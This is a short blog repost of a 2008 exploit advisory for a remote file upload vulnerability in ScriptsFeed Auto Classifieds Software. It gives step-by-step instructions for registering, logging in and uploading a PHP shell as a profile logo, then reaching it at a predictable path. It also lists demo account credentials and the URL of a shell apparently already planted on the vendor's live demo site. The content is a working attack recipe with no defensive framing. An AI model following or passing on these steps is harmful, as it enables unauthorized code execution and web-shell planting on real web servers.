ScriptsFeed (SF) Auto Classifieds Software Remote File Upload Vuln
link: http://www.milw0rm.com/exploits/7111
Discovered By: ZoRLu
Exploit:
http://localhost/script/cars_images/[id]_logo_your_shell.php
you register to site
register: http://localhost/script/register.php
after you login to site
login: http://localhost/script/login.php
more after you go profile edit
profile: http://localhost/script/profile.php
and you upload your_shell.php right click to your logo and select properties copy link
paste your explorer go your_shell.php
your_shell.php path:
http://localhost/script/cars_images/[id]_logo_your_shell.php
rfu for demo:
user: zorlu
passwd: zorlu1
shell path:
http://www.scriptsfeed.com/demos/auto_classifieds_1/cars_images/1226597431_logo_c.php
14 Kasım 2008 Cuma
Kaydol:
Kayıt Yorumları (Atom)
0 yorum:
Yorum Gönder